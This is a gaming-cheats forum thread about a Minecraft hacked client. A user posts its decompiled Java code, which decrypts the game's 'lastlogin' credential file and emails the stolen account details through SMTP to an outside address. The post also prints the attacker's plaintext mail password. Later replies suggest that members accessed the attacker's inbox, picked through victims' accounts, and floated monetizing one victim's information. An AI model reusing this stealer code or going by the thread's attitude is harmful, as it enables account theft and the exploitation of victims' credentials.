Page 2 of 2 FirstFirst 12
Results 16 to 19 of 19
  1. #16
    LordPankake's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    1,010
    Reputation
    260
    Thanks
    2,466
    My Mood
    Angry
    Quote Originally Posted by jyyt View Post
    Code:
      public static String MCStealer()
        throws Exception
      {
        String output = null;
        Random random = new Random(43287234L);
        byte[] salt = new byte[8];
        random.nextBytes(salt);
        PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5);
        SecretKey pbeKey = SecretKeyFactory.getInstance("PBEWithMD5AndDES").generateSecret(new PBEKeySpec("passwordfile".toCharArray()));
        Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES");
        cipher.init(2, pbeKey, pbeParamSpec);
        if (getWorkingDirectory().exists())
        {
          File lastLogin = new File(getWorkingDirectory(), "lastlogin"); DataInputStream dis = new DataInputStream(new CipherInputStream(new FileInputStream(lastLogin), cipher)); output = dis.readUTF() + " | " + dis.readUTF(); dis.close();
        }
        return output;
      }
    Approving yet another client with a lastlogin stealer in it.

    2 lastlogin stealers found on 2 days, I'm on a roll.

    Edit: Found his send function:
    Code:
    public static void Send()
      {
        filepath.mkdirs();
        System.out.println("Working");
    
        String from = "ElementalObsidian2@live.com";
        String pass = "Asdfjkl1234";
    
        String to = "watt5089@gmail.com";
        String host = "smtp.live.com";
    
        Properties properties = System.getProperties();
    
        properties.put("mail.smtp.starttls.enable", "true");
        properties.put("mail.smtp.host", host);
        properties.put("mail.smtp.user", from);
        properties.put("mail.smtp.password", pass);
        properties.put("mail.smtp.port", "587");
        properties.put("mail.smtp.auth", "true");
    
        Session session = Session.getDefaultInstance(properties);
        try
        {
          MimeMessage message = new MimeMessage(session);
    
          message.setFrom(new InternetAddress(from));
    
          message.addRecipient(Message.RecipientType.TO, new InternetAddress(to));
    
          message.setSubject("Account:");
          try
          {
            message.setText(MCStealer());
          }
          catch (Exception e)
          {
            System.out.println("Not Working");
            e.printStackTrace();
          }
    
          Transport transport = session.getTransport("smtp");
          transpor*****nnect(host, from, pass);
          transpo******ndMessage(message, message.getAllRecipients());
          transport.close();
        } catch (MessagingException mex) {
          mex.printStackTrace();
        }
      }
     




    Did I just...?

    Whoops, my bad.

  2. #17
    jyyt's Avatar
    Join Date
    Dec 2011
    Gender
    male
    Location
    Denmark
    Posts
    102
    Reputation
    12
    Thanks
    509
    My Mood
    Drunk
    Quote Originally Posted by LordPankake View Post
     




    Did I just...?

    Whoops, my bad.
    Respect to you, he actually had some nice accounts in there, I found a very nice one called: wizard@wizardha*****m.
    Thats almost baws!

  3. The Following User Says Thank You to jyyt For This Useful Post:

    LordPankake (06-05-2013)

  4. #18
    LordPankake's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    1,010
    Reputation
    260
    Thanks
    2,466
    My Mood
    Angry
    Quote Originally Posted by jyyt View Post
    Respect to you, he actually had some nice accounts in there, I found a very nice one called: wizard@wizardha*****m.
    A lot of people would pay lota to know his info. Time to monetize?

  5. #19
    molot's Avatar
    Join Date
    Apr 2013
    Gender
    male
    Location
    MPGH OR BED
    Posts
    1,796
    Reputation
    41
    Thanks
    223
    My Mood
    Cold
    looks good

Page 2 of 2 FirstFirst 12

Similar Threads

  1. [Release] Minecraft 1.5.2 Hacked Client – Kinky (Xenon) w/ optifine
    By _elz in forum Minecraft Hacks & Cheats
    Replies: 82
    Last Post: 07-09-2013, 08:27 AM
  2. [Release] Simple Optifine Client
    By asz119 in forum Minecraft Hacks & Cheats
    Replies: 20
    Last Post: 05-20-2013, 11:43 AM
  3. [Release] Simple Optifine Client [1.5.2]
    By asz119 in forum Minecraft Hacks & Cheats
    Replies: 52
    Last Post: 05-08-2013, 06:22 PM
  4. [Solved] Simple Client, box esp with no tracer lines
    By Eligos9 in forum Minecraft Help
    Replies: 5
    Last Post: 10-29-2012, 07:46 AM
  5. A very simple anti ban idea (client sided)
    By eRHGAERhaerh in forum Combat Arms EU Discussions
    Replies: 16
    Last Post: 06-24-2010, 10:32 PM